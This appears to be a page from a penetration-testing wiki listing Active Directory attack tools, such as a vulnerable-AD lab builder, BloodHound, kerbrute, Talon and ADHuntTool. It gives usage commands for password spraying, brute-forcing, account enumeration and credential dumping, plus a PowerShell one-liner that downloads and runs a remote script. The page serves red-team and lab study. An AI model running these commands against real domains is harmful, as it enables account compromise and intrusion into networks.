Active Directory
Vulnerable-AD: Create a vulnerable AD via this script.

Supported Attacks

  • Abusing ACLs/ACEs
  • Kerberoasting
  • AS-REP Roasting
  • Abuse DnsAdmins
  • Password in Object Description
  • User Objects With Default password (Changeme123!)
  • Password Spraying
  • DCSync
  • Silver Ticket
  • Golden Ticket
  • Pass-the-Hash
  • Pass-the-Ticket
  • SMB Signing Disabled
1
# if you didn't install Active Directory yet , you can try
2
Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\\Windows\\NTDS" -DomainMode "7" -DomainName "cs.org" -DomainNetbiosName "cs" -ForestMode "7" -InstallDns:$true -LogPath "C:\\Windows\\NTDS" -NoRebootOnCompletion:$false -SysvolPath "C:\\Windows\\SYSVOL" -Force:$true
3
# if you already installed Active Directory, just run the script !
4
IEX((new-object net.webclient).downloadstring("https://raw.githubusercontent.com/wazehell/vulnerable-AD/master/vulnad.ps1"));
5
Invoke-VulnAD -UsersLimit 100 -DomainName "cs.org"
Copied!
GitHub - WazeHell/vulnerable-AD: Create a vulnerable active directory that's allowing you to test most of the active directory attacks in a local lab
GitHub
bloodhound: BloodHound is an application developed with one purpose: to find relationships within an Active Directory (AD) domain to discover attack paths.
More BloodHound Cypher queries
phackt.com
BloodHound Cypher Cheatsheet
hausec
Max: Maximizing BloodHound. Max is a good boy.
cypheroth: Automated, extensible toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets.
1
./cypheroth.sh -u neo4j -p BloodHound -d TESTLAB.LOCAL -a localhost:7687 -v true -t 10s
Copied!
InveighZero: InveighZero is a C# LLMNR/NBNS/mDNS/DNS/DHCPv6 spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. This version shares many features with the PowerShell version of Inveigh.
CrackMapExec: CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.
EXE version to use along with Windows machines (e.g., Commando-VM).
GitHub - maaaaz/CrackMapExecWin: The great CrackMapExec tool compiled for Windows
GitHub
FindUncommonShares: The script FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Active Directory Domains.
KerberosUserEnum: Kerberos accounts enumeration taking advantage of AS-REQ, I wrote this script to practice my understanding of Kerberos.
1
./Enum.py --file=/tmp/usernames --dcip=192.168.88.1 --domain=TESTDOMAIN --port=88
Copied!
kerbrute: A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.
Kerbrute has three main commands:
  • bruteuser - Bruteforce a single user's password from a wordlist
  • bruteforce - Read username:password combos from a file or stdin and test them
  • passwordspray - Test a single password against a list of users
  • userenum - Enumerate valid domain usernames via Kerberos
1
./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
2
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
3
./kerbrute_linux_amd64 bruteforce --dc 192.168.x.x -d domain users.txt --safe -o out.txt
Copied!
ldapdomaindump: Active Directory information dumper via LDAP.
ADSearch: A tool written for cobalt-strike's execute-assembly command that allows for more efficent querying of AD.
ADHuntTool: official report for the AdHuntTool. C# Script used for Red Team. It can be used by Cobalt Strike execute-assembly or as a standalone executable.
1
Usage: ADHuntTool.exe options domain [arguments]
2
3
ADHuntTool.exe Set
4
ADHuntTool.exe DumpLocalAdmin RingZer0 *optional*computername
5
ADHuntTool.exe DumpLocalGroup RingZer0 *optional*computername
6
ADHuntTool.exe DumpRemoteSession RingZer0 *optional*computername
7
ADHuntTool.exe DumpWkstaSession RingZer0 *optional*computername
8
ADHuntTool.exe CheckAdmin RingZer0 *optional*computername
9
ADHuntTool.exe DumpTrust RingZer0
10
ADHuntTool.exe DumpAllUsers RingZer0
11
ADHuntTool.exe DumpUser RingZer0 mr.un1k0d3r
12
ADHuntTool.exe DumpUsersEmail RingZer0
13
ADHuntTool.exe DumpAllComputers RingZer0
14
ADHuntTool.exe DumpComputer RingZer0 DC01
15
ADHuntTool.exe DumpAllGroups RingZer0
16
ADHuntTool.exe DumpGroup RingZer0 "Domain Admins"
17
ADHuntTool.exe DumpPasswordPolicy Ringzer0,DC=local
18
ADHuntTool.exe DumpCertificateTemplates Ringzer0,DC=local
19
ADHuntTool.exe DumpPwdLastSet RingZer0
20
ADHuntTool.exe DumpLastLogon RingZer0
21
ADHuntTool.exe CheckManaged RingZer0
22
ADHuntTool.exe DumpLapsPassword RingZer0 *optional*computername
23
ADHuntTool.exe DumpUserPassword RingZer0
24
ADHuntTool.exe DumpRemoteSession RingZer0 *optional*computername
25
ADHuntTool.exe PasswordBruteForce RingZer0 *optional*username (samaccountname)
26
ADHuntTool.exe GetShare target *optional*Domain\Username Password
27
ADHuntTool.exe GetService target *optional*Domain\Username Password
Copied!
GitHub - Mr-Un1k0d3r/ADHuntTool: official repo for the AdHuntTool (part of the old RedTeamCSharpScripts repo)
GitHub
Talon: Talon is a tool designed to perform automated password guessing attacks while remaining undetected. Talon can enumerate a list of users to identify which users are valid, using Kerberos. Talon can also perform a password guessing attack against the Kerberos and LDAPS (LDAP Secure) services. Talon can either use a single domain controller or multiple ones to perform these attacks, randomizing each attempt, between the domain controllers and services (LDAP or Kerberos).
1
[email protected]:~# ./Talon -Hostfile DCs -Userfile ValidUsers -D STARLABS.local -P "Password!" -sleep 2
2
3
__________ ________ ___ ________ ________
4
|\___ _\\\ __ \|\ \ |\ __ \|\ ___ \
5
\|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \
6
\ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \
7
\ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \
8
\ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
9
\|__| \|__|\|__|\|_______|\|_______|\|__| \|__|
10
(@Tyl0us)
11
12
13
[-] 172.16.144.186 STARLABS.LOCAL\ballen:Password! = Failed
14
[-] 172.16.144.185 STARLABS.LOCAL\csnow:Password! = Failed
15
[-] 172.16.144.186 STARLABS.LOCAL\wwest:Password! = User's Account Locked
16
[*] Account lock out detected - Do you want to continue.[y/n]:
Copied!
RemotePotato0: RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.

Last modified 1mo ago
Copy link
Contents